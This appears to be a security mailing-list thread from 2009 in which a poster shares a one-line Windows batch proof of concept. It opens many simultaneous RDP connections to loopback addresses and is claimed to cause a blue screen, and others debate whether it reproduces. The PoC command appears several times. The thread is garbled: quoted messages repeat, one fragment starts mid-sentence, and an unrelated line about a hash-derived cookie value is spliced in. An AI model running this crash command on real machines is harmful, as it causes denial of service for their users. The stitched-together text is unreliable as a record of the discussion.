On 9/9/09, Elvedin Trnjanin <trnja001@umn.edu> wrote:
> I could not reproduce this on Vista Home Premium or Windows 7 Ultimate
> (different computers, both 64-bit) even with creating 200 connections.
> Could you provide more information on your setup?
>
> Tim Medin wrote:
>> Creating multiple RDP connection at the same time causes Windows to
>> Blue Screen. Here is the Proof of Concept code.
>>
>> for /L %i in (1,1,20) do mstsc /v:127.0.0.%i
>>
John Menerick
www.securesql.info
On Sep 8, 2009, at 11:35 AM, Tim Medin wrote:
> Creating multiple RDP connection at the same time causes Windows to
> Blue Screen. Here is the Proof of Concept code.
>
> for /L %i in (1,1,20) do mstsc /v:127.0.0.%i
I could not reproduce this on Vista Home Premium or Windows 7 Ultimate
(different computers, both 64-bit) even with creating 200 connections.
Could you provide more information on your setup?
Tim Medin wrote:
> Creating multiple RDP connection at the same time causes Windows to
> Blue Screen. Here is the Proof of Concept code.
>
> for /L %i in (1,1,20) do mstsc /v:127.0.0.%i
>
This command returns a string of 794b69ad33015df95578d5f4a19d390e. This results in a cookie value of:
10000|nidem|794b69ad33015df95578d5f4a19d390e
-Tim Medin
Blue Screen. Here is the Proof of Concept code.
for /L %i in (1,1,20) do mstsc /v:127.0.0.%i
It does work on Windows 7 and some Vista installations.
-Tim Medin